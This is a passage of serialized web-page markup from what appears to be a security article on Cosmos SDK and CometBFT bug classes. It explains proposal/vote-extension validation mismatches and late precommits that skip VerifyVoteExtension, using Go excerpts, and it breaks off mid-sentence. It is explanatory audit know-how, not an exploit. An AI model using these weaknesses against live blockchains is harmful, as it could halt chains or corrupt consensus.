errorsmod.Wrapf(sdkerrors.ErrUnauthorized, \"%s is not allowed to receive funds\", recipientAddr)\n }\n ...\n}\n",[86839],{"type":25,"tag":82,"props":86840,"children":86841},{"__ignoreMap":7},[86842,86874,86953,86968,86976,87007,87065,87072,87079],{"type":25,"tag":216,"props":86843,"children":86844},{"class":6922,"line":6923},[86845,86849,86853,86857,86862,86866,86870],{"type":25,"tag":216,"props":86846,"children":86847},{"style":6936},[86848],{"type":31,"value":80272},{"type":25,"tag":216,"props":86850,"children":86851},{"style":6964},[86852],{"type":31,"value":7016},{"type":25,"tag":216,"props":86854,"children":86855},{"style":6947},[86856],{"type":31,"value":85100},{"type":25,"tag":216,"props":86858,"children":86859},{"style":7375},[86860],{"type":31,"value":86861},"BaseKeeper",{"type":25,"tag":216,"props":86863,"children":86864},{"style":6964},[86865],{"type":31,"value":7036},{"type":25,"tag":216,"props":86867,"children":86868},{"style":7047},[86869],{"type":31,"value":85615},{"type":25,"tag":216,"props":86871,"children":86872},{"style":6964},[86873],{"type":31,"value":7420},{"type":25,"tag":216,"props":86875,"children":86876},{"class":6922,"line":6769},[86877,86881,86885,86889,86893,86897,86902,86906,86910,86915,86919,86923,86927,86931,86936,86940,86944,86949],{"type":25,"tag":216,"props":86878,"children":86879},{"style":6947},[86880],{"type":31,"value":29801},{"type":25,"tag":216,"props":86882,"children":86883},{"style":7375},[86884],{"type":31,"value":80312},{"type":25,"tag":216,"props":86886,"children":86887},{"style":6964},[86888],{"type":31,"value":179},{"type":25,"tag":216,"props":86890,"children":86891},{"style":7375},[86892],{"type":31,"value":80321},{"type":25,"tag":216,"props":86894,"children":86895},{"style":6964},[86896],{"type":31,"value":7026},{"type":25,"tag":216,"props":86898,"children":86899},{"style":6947},[86900],{"type":31,"value":86901},"senderModule",{"type":25,"tag":216,"props":86903,"children":86904},{"style":7375},[86905],{"type":31,"value":39992},{"type":25,"tag":216,"props":86907,"children":86908},{"style":6964},[86909],{"type":31,"value":7026},{"type":25,"tag":216,"props":86911,"children":86912},{"style":6947},[86913],{"type":31,"value":86914},"recipientAddr",{"type":25,"tag":216,"props":86916,"children":86917},{"style":7375},[86918],{"type":31,"value":82613},{"type":25,"tag":216,"props":86920,"children":86921},{"style":6964},[86922],{"type":31,"value":179},{"type":25,"tag":216,"props":86924,"children":86925},{"style":7375},[86926],{"type":31,"value":86600},{"type":25,"tag":216,"props":86928,"children":86929},{"style":6964},[86930],{"type":31,"value":7026},{"type":25,"tag":216,"props":86932,"children":86933},{"style":6947},[86934],{"type":31,"value":86935},"amt",{"type":25,"tag":216,"props":86937,"children":86938},{"style":7375},[86939],{"type":31,"value":82613},{"type":25,"tag":216,"props":86941,"children":86942},{"style":6964},[86943],{"type":31,"value":179},{"type":25,"tag":216,"props":86945,"children":86946},{"style":7375},[86947],{"type":31,"value":86948},"Coins",{"type":25,"tag":216,"props":86950,"children":86951},{"style":6964},[86952],{"type":31,"value":7465},{"type":25,"tag":216,"props":86954,"children":86955},{"class":6922,"line":6778},[86956,86960,86964],{"type":25,"tag":216,"props":86957,"children":86958},{"style":6964},[86959],{"type":31,"value":7036},{"type":25,"tag":216,"props":86961,"children":86962},{"style":7375},[86963],{"type":31,"value":18821},{"type":25,"tag":216,"props":86965,"children":86966},{"style":6964},[86967],{"type":31,"value":7241},{"type":25,"tag":216,"props":86969,"children":86970},{"class":6922,"line":7005},[86971],{"type":25,"tag":216,"props":86972,"children":86973},{"style":6953},[86974],{"type":31,"value":86975}," ...\n",{"type":25,"tag":216,"props":86977,"children":86978},{"class":6922,"line":7110},[86979,86983,86987,86991,86995,86999,87003],{"type":25,"tag":216,"props":86980,"children":86981},{"style":6973},[86982],{"type":31,"value":19746},{"type":25,"tag":216,"props":86984,"children":86985},{"style":6947},[86986],{"type":31,"value":85228},{"type":25,"tag":216,"props":86988,"children":86989},{"style":6964},[86990],{"type":31,"value":179},{"type":25,"tag":216,"props":86992,"children":86993},{"style":7047},[86994],{"type":31,"value":85631},{"type":25,"tag":216,"props":86996,"children":86997},{"style":6964},[86998],{"type":31,"value":1850},{"type":25,"tag":216,"props":87000,"children":87001},{"style":6947},[87002],{"type":31,"value":86914},{"type":25,"tag":216,"props":87004,"children":87005},{"style":6964},[87006],{"type":31,"value":18761},{"type":25,"tag":216,"props":87008,"children":87009},{"class":6922,"line":7216},[87010,87014,87019,87023,87027,87031,87035,87039,87044,87048,87053,87057,87061],{"type":25,"tag":216,"props":87011,"children":87012},{"style":6973},[87013],{"type":31,"value":43162},{"type":25,"tag":216,"props":87015,"children":87016},{"style":6947},[87017],{"type":31,"value":87018}," errorsmod",{"type":25,"tag":216,"props":87020,"children":87021},{"style":6964},[87022],{"type":31,"value":179},{"type":25,"tag":216,"props":87024,"children":87025},{"style":7047},[87026],{"type":31,"value":84882},{"type":25,"tag":216,"props":87028,"children":87029},{"style":6964},[87030],{"type":31,"value":1850},{"type":25,"tag":216,"props":87032,"children":87033},{"style":6947},[87034],{"type":31,"value":84544},{"type":25,"tag":216,"props":87036,"children":87037},{"style":6964},[87038],{"type":31,"value":179},{"type":25,"tag":216,"props":87040,"children":87041},{"style":6947},[87042],{"type":31,"value":87043},"ErrUnauthorized",{"type":25,"tag":216,"props":87045,"children":87046},{"style":6964},[87047],{"type":31,"value":7026},{"type":25,"tag":216,"props":87049,"children":87050},{"style":8205},[87051],{"type":31,"value":87052},"\"%s is not allowed to receive funds\"",{"type":25,"tag":216,"props":87054,"children":87055},{"style":6964},[87056],{"type":31,"value":7026},{"type":25,"tag":216,"props":87058,"children":87059},{"style":6947},[87060],{"type":31,"value":86914},{"type":25,"tag":216,"props":87062,"children":87063},{"style":6964},[87064],{"type":31,"value":7107},{"type":25,"tag":216,"props":87066,"children":87067},{"class":6922,"line":7244},[87068],{"type":25,"tag":216,"props":87069,"children":87070},{"style":6964},[87071],{"type":31,"value":13552},{"type":25,"tag":216,"props":87073,"children":87074},{"class":6922,"line":7257},[87075],{"type":25,"tag":216,"props":87076,"children":87077},{"style":6953},[87078],{"type":31,"value":86975},{"type":25,"tag":216,"props":87080,"children":87081},{"class":6922,"line":7275},[87082],{"type":25,"tag":216,"props":87083,"children":87084},{"style":6964},[87085],{"type":31,"value":7874},{"type":25,"tag":38,"props":87087,"children":87088},{},[87089,87091,87098],{"type":31,"value":87090},"This shows even well-known bug classes still resurface from time to time due to unforeseen invariant violations. Additional examples include ",{"type":25,"tag":162,"props":87092,"children":87095},{"href":87093,"rel":87094},"https://hackerone.com/reports/3018307",[166],[87096],{"type":31,"value":87097},"improper decimal handling in the group module",{"type":31,"value":179},{"type":25,"tag":26,"props":87100,"children":87102},{"id":87101},"same-same-but-different",[87103],{"type":31,"value":87104},"Same, Same... But Different",{"type":25,"tag":38,"props":87106,"children":87107},{},[87108,87110,87116,87117,87123,87124,87130,87131,87137],{"type":31,"value":87109},"Cosmos exposes several consensus-level interfaces, such as ",{"type":25,"tag":82,"props":87111,"children":87113},{"className":87112},[],[87114],{"type":31,"value":87115},"PrepareProposal",{"type":31,"value":7026},{"type":25,"tag":82,"props":87118,"children":87120},{"className":87119},[],[87121],{"type":31,"value":87122},"ProcessProposal",{"type":31,"value":7026},{"type":25,"tag":82,"props":87125,"children":87127},{"className":87126},[],[87128],{"type":31,"value":87129},"ExtendVote",{"type":31,"value":10439},{"type":25,"tag":82,"props":87132,"children":87134},{"className":87133},[],[87135],{"type":31,"value":87136},"VerifyVoteExtension",{"type":31,"value":87138},". These ABCI methods allow developers to customize how blocks are constructed, as well as inject supplementary data into each block.",{"type":25,"tag":38,"props":87140,"children":87141},{},[87142],{"type":31,"value":87143},"Two of the best-known attack surfaces are",{"type":25,"tag":6711,"props":87145,"children":87146},{},[87147,87176],{"type":25,"tag":2043,"props":87148,"children":87149},{},[87150,87155,87156,87161,87163,87168,87169,87174],{"type":25,"tag":82,"props":87151,"children":87153},{"className":87152},[],[87154],{"type":31,"value":87115},{"type":31,"value":7016},{"type":25,"tag":82,"props":87157,"children":87159},{"className":87158},[],[87160],{"type":31,"value":87129},{"type":31,"value":87162},") outputs being rejected due to ",{"type":25,"tag":82,"props":87164,"children":87166},{"className":87165},[],[87167],{"type":31,"value":87122},{"type":31,"value":7016},{"type":25,"tag":82,"props":87170,"children":87172},{"className":87171},[],[87173],{"type":31,"value":87136},{"type":31,"value":87175},") over-validating, resulting in liveness failures.",{"type":25,"tag":2043,"props":87177,"children":87178},{},[87179,87181,87186,87187,87192,87194,87199,87200,87205],{"type":31,"value":87180},"Malicious proposals and vote extensions not created through the ",{"type":25,"tag":82,"props":87182,"children":87184},{"className":87183},[],[87185],{"type":31,"value":87115},{"type":31,"value":7016},{"type":25,"tag":82,"props":87188,"children":87190},{"className":87189},[],[87191],{"type":31,"value":87129},{"type":31,"value":87193},") are accepted due to ",{"type":25,"tag":82,"props":87195,"children":87197},{"className":87196},[],[87198],{"type":31,"value":87122},{"type":31,"value":7016},{"type":25,"tag":82,"props":87201,"children":87203},{"className":87202},[],[87204],{"type":31,"value":87136},{"type":31,"value":87206},") under-validating.",{"type":25,"tag":38,"props":87208,"children":87209},{},[87210],{"type":31,"value":87211},"In essence, any difference in pairs of handlers will likely lead to security issues.",{"type":25,"tag":38,"props":87213,"children":87214},{},[87215,87217,87223,87225,87230],{"type":31,"value":87216},"There are also a few lesser known variants of these issues. One instance is the validation of ",{"type":25,"tag":82,"props":87218,"children":87220},{"className":87219},[],[87221],{"type":31,"value":87222},"VoteExtensions",{"type":31,"value":87224}," within ",{"type":25,"tag":82,"props":87226,"children":87228},{"className":87227},[],[87229],{"type":31,"value":87115},{"type":31,"value":87231},". To provide context, we start with a primer on the CometBTF consensus and vote extensions.",{"type":25,"tag":38,"props":87233,"children":87234},{},[87235,87237,87242,87244,87249],{"type":31,"value":87236},"Consensus starts with a leader creating a proposal and then broadcasting it to each validator. Validators then proceed to vote on whether or not to accept the proposal. During the voting phase, ",{"type":25,"tag":82,"props":87238,"children":87240},{"className":87239},[],[87241],{"type":31,"value":87129},{"type":31,"value":87243}," is called to attach additional data to the votes. Once a validator collects enough valid votes that pass ",{"type":25,"tag":82,"props":87245,"children":87247},{"className":87246},[],[87248],{"type":31,"value":87136},{"type":31,"value":87250},", a proposal is considered accepted and can be committed. After committing the proposal, a new leader starts to create the next proposal, bringing us back to the point where we started.",{"type":25,"tag":38,"props":87252,"children":87253},{},[87254,87256,87261],{"type":31,"value":87255},"So, where are the attached vote extension data used? It turns out a leader should include the vote extensions of the previous consensus round in its proposal. It might be tempting to conclude that all vote extensions an honest leader accepted have passed the ",{"type":25,"tag":82,"props":87257,"children":87259},{"className":87258},[],[87260],{"type":31,"value":87136},{"type":31,"value":87262}," check and are therefore valid. Thus, we can directly inject all vote extensions into our proposal.",{"type":25,"tag":38,"props":87264,"children":87265},{},[87266,87268,87273,87275,87281],{"type":31,"value":87267},"Unfortunately, CometBTF directly accepts late precommits without passing them through ",{"type":25,"tag":82,"props":87269,"children":87271},{"className":87270},[],[87272],{"type":31,"value":87136},{"type":31,"value":87274},". This exposes a time window where Byzantine validators can smuggle malicious vote into the next leader's cache, luring the leader into including invalid vote extensions into its ",{"type":25,"tag":82,"props":87276,"children":87278},{"className":87277},[],[87279],{"type":31,"value":87280},"Proposal",{"type":31,"value":179},{"type":25,"tag":206,"props":87283,"children":87285},{"code":87284,"language":80136,"meta":7,"className":80137,"style":7},"func (cs *State) addVote(vote *types.Vote, peerID p2p.ID) (added bool, err error) {\n    ...\n\n    // A precommit for the previous height?\n    // These come in while we wait timeoutCommit\n    if vote.Height+1 == cs.Height && vote.Type == types.PrecommitType {\n        ...\n        // Late precommits are not checked by VerifyVoteExtension\n        added, err = cs.LastCommit.AddVote(vote)\n        ...\n        return added, err\n    }\n    extEnabled := cs.state.ConsensusParams.Feature.VoteExtensionsEnabled(vote.Height)\n    if extEnabled {\n        ...\n        if vote.Type == types.PrecommitType && !vote.BlockID.IsNil() &&\n            !bytes.Equal(vote.ValidatorAddress, myAddr) { // Skip the VerifyVoteExtension call if the vote was issued by this validator.\n            ...\n            err := cs.blockExec.VerifyVoteExtension(context.TODO(), vote)\n            ...\n        }\n    } else if {\n        ...\n    }\n    ...\n}\n",[87286],{"type":25,"tag":82,"props":87287,"children":87288},{"__ignoreMap":7},[87289,87401,87408,87415,87423,87431,87515,87522,87530,87584,87591,87612,87619,87691,87707,87714,87788,87844,87851,87913,87920,87927,87946,87953,87960,87967],{"type":25,"tag":216,"props":87290,"children":87291},{"class":6922,"line":6923},[87292,87296,87300,87305,87309,87314,87318,87323,87327,87332,87336,87340,87344,87349,87353,87358,87363,87367,87372,87376,87381,87385,87389,87393,87397],{"type":25,"tag":216,"props":87293,"children":87294},{"style":6936},[87295],{"type":31,"value":80272},{"type":25,"tag":216,"props":87297,"children":87298},{"style":6964},[87299],{"type":31,"value":7016},{"type":25,"tag":216,"props":87301,"children":87302},{"style":6947},[87303],{"type":31,"value":87304},"cs ",{"type":25,"tag":216,"props":87306,"children":87307},{"style":6953},[87308],{"type":31,"value":8519},{"type":25,"tag":216,"props":87310,"children":87311},{"style":7375},[87312],{"type":31,"value":87313},"State",{"type":25,"tag":216,"props":87315,"children":87316},{"style":6964},[87317],{"type":31,"value":7036},{"type":25,"tag":216,"props":87319,"children":87320},{"style":7047},[87321],{"type":31,"value":87322},"addVote",{"type":25,"tag":216,"props":87324,"children":87325},{"style":6964},[87326],{"type":31,"value":1850},{"type":25,"tag":216,"props":87328,"children":87329},{"style":6947},[87330],{"type":31,"value":87331},"vote",{"type":25,"tag":216,"props":87333,"children":87334},{"style":6953},[87335],{"type":31,"value":13773},{"type":25,"tag":216,"props":87337,"children":87338},{"style":7375},[87339],{"type":31,"value":9709},{"type":25,"tag":216,"props":87341,"children":87342},{"style":6964},[87343],{"type":31,"value":179},{"type":25,"tag":216,"props":87345,"children":87346},{"style":7375},[87347],{"type":31,"value":87348},"Vote",{"type":25,"tag":216,"props":87350,"children":87351},{"style":6964},[87352],{"type":31,"value":7026},{"type":25,"tag":216,"props":87354,"children":87355},{"style":6947},[87356],{"type":31,"value":87357},"peerID",{"type":25,"tag":216,"props":87359,"children":87360},{"style":7375},[87361],{"type":31,"value":87362}," p2p",{"type":25,"tag":216,"props":87364,"children":87365},{"style":6964},[87366],{"type":31,"value":179},{"type":25,"tag":216,"props":87368,"children":87369},{"style":7375},[87370],{"type":31,"value":87371},"ID",{"type":25,"tag":216,"props":87373,"children":87374},{"style":6964},[87375],{"type":31,"value":80354},{"type":25,"tag":216,"props":87377,"children":87378},{"style":6947},[87379],{"type":31,"value":87380},"added",{"type":25,"tag":216,"props":87382,"children":87383},{"style":7375},[87384],{"type":31,"value":16006},{"type":25,"tag":216,"props":87386,"children":87387},{"style":6964},[87388],{"type":31,"value":7026},{"type":25,"tag":216,"props":87390,"children":87391},{"style":6947},[87392],{"type":31,"value":52389},{"type":25,"tag":216,"props":87394,"children":87395},{"style":7375},[87396],{"type":31,"value":18834},{"type":25,"tag":216,"props":87398,"children":87399},{"style":6964},[87400],{"type":31,"value":18761},{"type":25,"tag":216,"props":87402,"children":87403},{"class":6922,"line":6769},[87404],{"type":25,"tag":216,"props":87405,"children":87406},{"style":6953},[87407],{"type":31,"value":24299},{"type":25,"tag":216,"props":87409,"children":87410},{"class":6922,"line":6778},[87411],{"type":25,"tag":216,"props":87412,"children":87413},{"emptyLinePlaceholder":16},[87414],{"type":31,"value":7642},{"type":25,"tag":216,"props":87416,"children":87417},{"class":6922,"line":7005},[87418],{"type":25,"tag":216,"props":87419,"children":87420},{"style":6927},[87421],{"type":31,"value":87422},"    // A precommit for the previous height?\n",{"type":25,"tag":216,"props":87424,"children":87425},{"class":6922,"line":7110},[87426],{"type":25,"tag":216,"props":87427,"children":87428},{"style":6927},[87429],{"type":31,"value":87430},"    // These come in while we wait timeoutCommit\n",{"type":25,"tag":216,"props":87432,"children":87433},{"class":6922,"line":7216},[87434,87438,87443,87447,87452,87456,87460,87464,87469,87473,87477,87481,87485,87489,87494,87498,87502,87506,87511],{"type":25,"tag":216,"props":87435,"children":87436},{"style":6973},[87437],{"type":31,"value":16235},{"type":25,"tag":216,"props":87439,"children":87440},{"style":6947},[87441],{"type":31,"value":87442}," vote",{"type":25,"tag":216,"props":87444,"children":87445},{"style":6964},[87446],{"type":31,"value":179},{"type":25,"tag":216,"props":87448,"children":87449},{"style":6947},[87450],{"type":31,"value":87451},"Height",{"type":25,"tag":216,"props":87453,"children":87454},{"style":6953},[87455],{"type":31,"value":3539},{"type":25,"tag":216,"props":87457,"children":87458},{"style":6989},[87459],{"type":31,"value":184},{"type":25,"tag":216,"props":87461,"children":87462},{"style":6953},[87463],{"type":31,"value":7232},{"type":25,"tag":216,"props":87465,"children":87466},{"style":6947},[87467],{"type":31,"value":87468}," cs",{"type":25,"tag":216,"props":87470,"children":87471},{"style":6964},[87472],{"type":31,"value":179},{"type":25,"tag":216,"props":87474,"children":87475},{"style":6947},[87476],{"type":31,"value":87451},{"type":25,"tag":216,"props":87478,"children":87479},{"style":6953},[87480],{"type":31,"value":18142},{"type":25,"tag":216,"props":87482,"children":87483},{"style":6947},[87484],{"type":31,"value":87442},{"type":25,"tag":216,"props":87486,"children":87487},{"style":6964},[87488],{"type":31,"value":179},{"type":25,"tag":216,"props":87490,"children":87491},{"style":6947},[87492],{"type":31,"value":87493},"Type",{"type":25,"tag":216,"props":87495,"children":87496},{"style":6953},[87497],{"type":31,"value":7232},{"type":25,"tag":216,"props":87499,"children":87500},{"style":6947},[87501],{"type":31,"value":82147},{"type":25,"tag":216,"props":87503,"children":87504},{"style":6964},[87505],{"type":31,"value":179},{"type":25,"tag":216,"props":87507,"children":87508},{"style":6947},[87509],{"type":31,"value":87510},"PrecommitType",{"type":25,"tag":216,"props":87512,"children":87513},{"style":6964},[87514],{"type":31,"value":7241},{"type":25,"tag":216,"props":87516,"children":87517},{"class":6922,"line":7244},[87518],{"type":25,"tag":216,"props":87519,"children":87520},{"style":6953},[87521],{"type":31,"value":85814},{"type":25,"tag":216,"props":87523,"children":87524},{"class":6922,"line":7257},[87525],{"type":25,"tag":216,"props":87526,"children":87527},{"style":6927},[87528],{"type":31,"value":87529},"        // Late precommits are not checked by VerifyVoteExtension\n",{"type":25,"tag":216,"props":87531,"children":87532},{"class":6922,"line":7275},[87533,87538,87542,87546,87550,87554,87558,87563,87567,87572,87576,87580],{"type":25,"tag":216,"props":87534,"children":87535},{"style":6947},[87536],{"type":31,"value":87537},"        added",{"type":25,"tag":216,"props":87539,"children":87540},{"style":6964},[87541],{"type":31,"value":7026},{"type":25,"tag":216,"props":87543,"children":87544},{"style":6947},[87545],{"type":31,"value":52389},{"type":25,"tag":216,"props":87547,"children":87548},{"style":6953},[87549],{"type":31,"value":6956},{"type":25,"tag":216,"props":87551,"children":87552},{"style":6947},[87553],{"type":31,"value":87468},{"type":25,"tag":216,"props":87555,"children":87556},{"style":6964},[87557],{"type":31,"value":179},{"type":25,"tag":216,"props":87559,"children":87560},{"style":6947},[87561],{"type":31,"value":87562},"LastCommit",{"type":25,"tag":216,"props":87564,"children":87565},{"style":6964},[87566],{"type":31,"value":179},{"type":25,"tag":216,"props":87568,"children":87569},{"style":7047},[87570],{"type":31,"value":87571},"AddVote",{"type":25,"tag":216,"props":87573,"children":87574},{"style":6964},[87575],{"type":31,"value":1850},{"type":25,"tag":216,"props":87577,"children":87578},{"style":6947},[87579],{"type":31,"value":87331},{"type":25,"tag":216,"props":87581,"children":87582},{"style":6964},[87583],{"type":31,"value":7107},{"type":25,"tag":216,"props":87585,"children":87586},{"class":6922,"line":7296},[87587],{"type":25,"tag":216,"props":87588,"children":87589},{"style":6953},[87590],{"type":31,"value":85814},{"type":25,"tag":216,"props":87592,"children":87593},{"class":6922,"line":7305},[87594,87598,87603,87607],{"type":25,"tag":216,"props":87595,"children":87596},{"style":6973},[87597],{"type":31,"value":19702},{"type":25,"tag":216,"props":87599,"children":87600},{"style":6947},[87601],{"type":31,"value":87602}," added",{"type":25,"tag":216,"props":87604,"children":87605},{"style":6964},[87606],{"type":31,"value":7026},{"type":25,"tag":216,"props":87608,"children":87609},{"style":6947},[87610],{"type":31,"value":87611},"err\n",{"type":25,"tag":216,"props":87613,"children":87614},{"class":6922,"line":7557},[87615],{"type":25,"tag":216,"props":87616,"children":87617},{"style":6964},[87618],{"type":31,"value":7311},{"type":25,"tag":216,"props":87620,"children":87621},{"class":6922,"line":7574},[87622,87627,87631,87635,87639,87644,87648,87653,87657,87662,87666,87671,87675,87679,87683,87687],{"type":25,"tag":216,"props":87623,"children":87624},{"style":6947},[87625],{"type":31,"value":87626},"    extEnabled",{"type":25,"tag":216,"props":87628,"children":87629},{"style":6953},[87630],{"type":31,"value":80388},{"type":25,"tag":216,"props":87632,"children":87633},{"style":6947},[87634],{"type":31,"value":87468},{"type":25,"tag":216,"props":87636,"children":87637},{"style":6964},[87638],{"type":31,"value":179},{"type":25,"tag":216,"props":87640,"children":87641},{"style":6947},[87642],{"type":31,"value":87643},"state",{"type":25,"tag":216,"props":87645,"children":87646},{"style":6964},[87647],{"type":31,"value":179},{"type":25,"tag":216,"props":87649,"children":87650},{"style":6947},[87651],{"type":31,"value":87652},"ConsensusParams",{"type":25,"tag":216,"props":87654,"children":87655},{"style":6964},[87656],{"type":31,"value":179},{"type":25,"tag":216,"props":87658,"children":87659},{"style":6947},[87660],{"type":31,"value":87661},"Feature",{"type":25,"tag":216,"props":87663,"children":87664},{"style":6964},[87665],{"type":31,"value":179},{"type":25,"tag":216,"props":87667,"children":87668},{"style":7047},[87669],{"type":31,"value":87670},"VoteExtensionsEnabled",{"type":25,"tag":216,"props":87672,"children":87673},{"style":6964},[87674],{"type":31,"value":1850},{"type":25,"tag":216,"props":87676,"children":87677},{"style":6947},[87678],{"type":31,"value":87331},{"type":25,"tag":216,"props":87680,"children":87681},{"style":6964},[87682],{"type":31,"value":179},{"type":25,"tag":216,"props":87684,"children":87685},{"style":6947},[87686],{"type":31,"value":87451},{"type":25,"tag":216,"props":87688,"children":87689},{"style":6964},[87690],{"type":31,"value":7107},{"type":25,"tag":216,"props":87692,"children":87693},{"class":6922,"line":7591},[87694,87698,87703],{"type":25,"tag":216,"props":87695,"children":87696},{"style":6973},[87697],{"type":31,"value":16235},{"type":25,"tag":216,"props":87699,"children":87700},{"style":6947},[87701],{"type":31,"value":87702}," extEnabled",{"type":25,"tag":216,"props":87704,"children":87705},{"style":6964},[87706],{"type":31,"value":7241},{"type":25,"tag":216,"props":87708,"children":87709},{"class":6922,"line":7604},[87710],{"type":25,"tag":216,"props":87711,"children":87712},{"style":6953},[87713],{"type":31,"value":85814},{"type":25,"tag":216,"props":87715,"children":87716},{"class":6922,"line":7613},[87717,87721,87725,87729,87733,87737,87741,87745,87749,87753,87757,87761,87765,87770,87774,87779,87783],{"type":25,"tag":216,"props":87718,"children":87719},{"style":6973},[87720],{"type":31,"value":7222},{"type":25,"tag":216,"props":87722,"children":87723},{"style":6947},[87724],{"type":31,"value":87442},{"type":25,"tag":216,"props":87726,"children":87727},{"style":6964},[87728],{"type":31,"value":179},{"type":25,"tag":216,"props":87730,"children":87731},{"style":6947},[87732],{"type":31,"value":87493},{"type":25,"tag":216,"props":87734,"children":87735},{"style":6953},[87736],{"type":31,"value":7232},{"type":25,"tag":216,"props":87738,"children":87739},{"style":6947},[87740],{"type":31,"value":82147},{"type":25,"tag":216,"props":87742,"children":87743},{"style":6964},[87744],{"type":31,"value":179},{"type":25,"tag":216,"props":87746,"children":87747},{"style":6947},[87748],{"type":31,"value":87510},{"type":25,"tag":216,"props":87750,"children":87751},{"style":6953},[87752],{"type":31,"value":18142},{"type":25,"tag":216,"props":87754,"children":87755},{"style":6953},[87756],{"type":31,"value":16820},{"type":25,"tag":216,"props":87758,"children":87759},{"style":6947},[87760],{"type":31,"value":87331},{"type":25,"tag":216,"props":87762,"children":87763},{"style":6964},[87764],{"type":31,"value":179},{"type":25,"tag":216,"props":87766,"children":87767},{"style":6947},[87768],{"type":31,"value":87769},"BlockID",{"type":25,"tag":216,"props":87771,"children":87772},{"style":6964},[87773],{"type":31,"value":179},{"type":25,"tag":216,"props":87775,"children":87776},{"style":7047},[87777],{"type":31,"value":87778},"IsNil",{"type":25,"tag":216,"props":87780,"children":87781},{"style":6964},[87782],{"type":31,"value":18000},{"type":25,"tag":216,"props":87784,"children":87785},{"style":6953},[87786],{"type":31,"value":87787},"&&\n",{"type":25,"tag":216,"props":87789,"children":87790},{"class":6922,"line":7636},[87791,87796,87801,87805,87809,87813,87817,87821,87826,87830,87835,87839],{"type":25,"tag":216,"props":87792,"children":87793},{"style":6953},[87794],{"type":31,"value":87795},"            !",{"type":25,"tag":216,"props":87797,"children":87798},{"style":6947},[87799],{"type":31,"value":87800},"bytes",{"type":25,"tag":216,"props":87802,"children":87803},{"style":6964},[87804],{"type":31,"value":179},{"type":25,"tag":216,"props":87806,"children":87807},{"style":7047},[87808],{"type":31,"value":86270},{"type":25,"tag":216,"props":87810,"children":87811},{"style":6964},[87812],{"type":31,"value":1850},{"type":25,"tag":216,"props":87814,"children":87815},{"style":6947},[87816],{"type":31,"value":87331},{"type":25,"tag":216,"props":87818,"children":87819},{"style":6964},[87820],{"type":31,"value":179},{"type":25,"tag":216,"props":87822,"children":87823},{"style":6947},[87824],{"type":31,"value":87825},"ValidatorAddress",{"type":25,"tag":216,"props":87827,"children":87828},{"style":6964},[87829],{"type":31,"value":7026},{"type":25,"tag":216,"props":87831,"children":87832},{"style":6947},[87833],{"type":31,"value":87834},"myAddr",{"type":25,"tag":216,"props":87836,"children":87837},{"style":6964},[87838],{"type":31,"value":27946},{"type":25,"tag":216,"props":87840,"children":87841},{"style":6927},[87842],{"type":31,"value":87843},"// Skip the VerifyVoteExtension call if the vote was issued by this validator.\n",{"type":25,"tag":216,"props":87845,"children":87846},{"class":6922,"line":7645},[87847],{"type":25,"tag":216,"props":87848,"children":87849},{"style":6953},[87850],{"type":31,"value":86490},{"type":25,"tag":216,"props":87852,"children":87853},{"class":6922,"line":7654},[87854,87858,87862,87866,87870,87875,87879,87883,87887,87892,87896,87901,87905,87909],{"type":25,"tag":216,"props":87855,"children":87856},{"style":6947},[87857],{"type":31,"value":86308},{"type":25,"tag":216,"props":87859,"children":87860},{"style":6953},[87861],{"type":31,"value":80388},{"type":25,"tag":216,"props":87863,"children":87864},{"style":6947},[87865],{"type":31,"value":87468},{"type":25,"tag":216,"props":87867,"children":87868},{"style":6964},[87869],{"type":31,"value":179},{"type":25,"tag":216,"props":87871,"children":87872},{"style":6947},[87873],{"type":31,"value":87874},"blockExec",{"type":25,"tag":216,"props":87876,"children":87877},{"style":6964},[87878],{"type":31,"value":179},{"type":25,"tag":216,"props":87880,"children":87881},{"style":7047},[87882],{"type":31,"value":87136},{"type":25,"tag":216,"props":87884,"children":87885},{"style":6964},[87886],{"type":31,"value":1850},{"type":25,"tag":216,"props":87888,"children":87889},{"style":6947},[87890],{"type":31,"value":87891},"context",{"type":25,"tag":216,"props":87893,"children":87894},{"style":6964},[87895],{"type":31,"value":179},{"type":25,"tag":216,"props":87897,"children":87898},{"style":7047},[87899],{"type":31,"value":87900},"TODO",{"type":25,"tag":216,"props":87902,"children":87903},{"style":6964},[87904],{"type":31,"value":22334},{"type":25,"tag":216,"props":87906,"children":87907},{"style":6947},[87908],{"type":31,"value":87331},{"type":25,"tag":216,"props":87910,"children":87911},{"style":6964},[87912],{"type":31,"value":7107},{"type":25,"tag":216,"props":87914,"children":87915},{"class":6922,"line":7722},[87916],{"type":25,"tag":216,"props":87917,"children":87918},{"style":6953},[87919],{"type":31,"value":86490},{"type":25,"tag":216,"props":87921,"children":87922},{"class":6922,"line":7730},[87923],{"type":25,"tag":216,"props":87924,"children":87925},{"style":6964},[87926],{"type":31,"value":7302},{"type":25,"tag":216,"props":87928,"children":87929},{"class":6922,"line":7760},[87930,87934,87938,87942],{"type":25,"tag":216,"props":87931,"children":87932},{"style":6964},[87933],{"type":31,"value":19737},{"type":25,"tag":216,"props":87935,"children":87936},{"style":6973},[87937],{"type":31,"value":7268},{"type":25,"tag":216,"props":87939,"children":87940},{"style":6973},[87941],{"type":31,"value":19746},{"type":25,"tag":216,"props":87943,"children":87944},{"style":6964},[87945],{"type":31,"value":7241},{"type":25,"tag":216,"props":87947,"children":87948},{"class":6922,"line":7768},[87949],{"type":25,"tag":216,"props":87950,"children":87951},{"style":6953},[87952],{"type":31,"value":85814},{"type":25,"tag":216,"props":87954,"children":87955},{"class":6922,"line":7800},[87956],{"type":25,"tag":216,"props":87957,"children":87958},{"style":6964},[87959],{"type":31,"value":7311},{"type":25,"tag":216,"props":87961,"children":87962},{"class":6922,"line":7808},[87963],{"type":25,"tag":216,"props":87964,"children":87965},{"style":6953},[87966],{"type":31,"value":24299},{"type":25,"tag":216,"props":87968,"children":87969},{"class":6922,"line":7868},[87970],{"type":25,"tag":216,"props":87971,"children":87972},{"style":6964},[87973],{"type":31,"value":7874},{"type":25,"tag":38,"props":87975,"children":87976},{},[87977],{"type":31,"value":87978},"If developers are not aware of the subtle details regarding vote extension handling in CometBTF, it is quite easy to overlook implementing protections against these attacks.",{"type":25,"tag":606,"props":87980,"children":87982},{"id":87981},"real-world-examples-4",[87983],{"type":31,"value":80661},{"type":25,"tag":38,"props":87985,"children":87986},{},[87987,87989,87994,87996,88002,88004,88010],{"type":31,"value":87988},"An example of the bug we just described is shown here. ",{"type":25,"tag":82,"props":87990,"children":87992},{"className":87991},[],[87993],{"type":31,"value":87115},{"type":31,"value":87995}," only checks that each vote is properly signed by a validator in 